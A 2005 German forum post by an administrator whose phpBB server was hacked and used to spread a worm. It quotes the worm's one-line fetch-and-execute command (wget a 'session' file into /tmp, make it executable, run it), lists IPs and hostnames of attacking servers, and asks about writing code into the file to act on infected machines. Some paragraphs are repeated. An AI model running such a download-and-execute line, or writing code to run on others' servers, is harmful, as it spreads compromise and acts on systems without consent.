Downloads von attackierten Servers stoppen
Posted: 2005-07-28 16:48
Unser Server wurde mittels phpBB gehackt und ein Malware/Wurm wurde bei uns ausgehängt. Andere Servers mit phpBB wurden attackiert (nicht nur von uns) und folgende Code aufgerufen:
Es hat uns 15GB in ein paar Studen gekostet bis wir den session Datei gelöscht haben.
Nach der Reinstallation mit neuem Kernel und phpBB, sehen die Downloads so aus:
Ich habe schon etwa 6 "most active" Servers auf dem Firewall gesperrt und ich habe es versucht die Admins zu informieren. Manchmal geht es aber nicht, und ich weiß nicht welche Servers führen die Attacken.
Ich habe es dem Apache verboten dem Wget agent etwas zurrück zu schicken und unserem Server geht es relative gut.
:?: Wäre es möglich, dass ich irgendetwas in "session" schreibe so dass die Attacken stoppen? Ich dachte etwas wie ein email and root schicken oder phpBB patchen oder wget abschalten ...
Code: Select all
cd /tmp;wget http://unserserver.net/forum/db/session;chmod +x session;./session;rm -f sessionNach der Reinstallation mit neuem Kernel und phpBB, sehen die Downloads so aus:
Code: Select all
Most active IPs previous hour:
--------------------------------------------------------------------------------
194 66.193.231.24 66-193-231-24.dimenoc.com
184 193.26.214.61 193.26.214.61
177 213.246.55.128 IK55128.ikexpress.com
176 203.194.162.205 203.194.162.205
174 128.121.21.36 cobalt18.nexpoint.net
118 67.43.0.119 host.flaremedia.net
118 38.113.1.97 ip38-113-1-97.yourhostingaccount.com
55 217.19.17.9 gamez2.tweakdsl.nl
23 82.239.30.193 ita73-1-82-239-30-193.fbx.proxad.net
23 213.193.229.240 zion.be.priorweb.net
23 62.70.14.144 darkdate.com
Most active IPs last day:
--------------------------------------------------------------------------------
1035 62.70.14.144 darkdate.com
658 213.239.206.98 soccer-manager.org
597 66.193.231.24 66-193-231-24.dimenoc.com
553 209.59.181.125 host.hansiu.com
553 82.239.30.193 ita73-1-82-239-30-193.fbx.proxad.net
506 82.194.66.40 linux08.dns-servicios.com
465 67.43.0.119 host.flaremedia.net
445 216.180.225.178 server21.snhdns.com
438 80.75.73.12 mx1.budokit.com
424 128.121.21.36 cobalt18.nexpoint.net
397 161.53.2.130 jagor.srce.hr
Downloads by days:
--------------------------------------------------------------------------------
Jul 28 17669
Jul 27 44149
Jul 26 72037
Jul 25 111886
Jul 24 194810
Jul 23 427947
Jul 22 462628
Jul 21 2Ich habe es dem Apache verboten dem Wget agent etwas zurrück zu schicken und unserem Server geht es relative gut.
:?: Wäre es möglich, dass ich irgendetwas in "session" schreibe so dass die Attacken stoppen? Ich dachte etwas wie ein email and root schicken oder phpBB patchen oder wget abschalten ...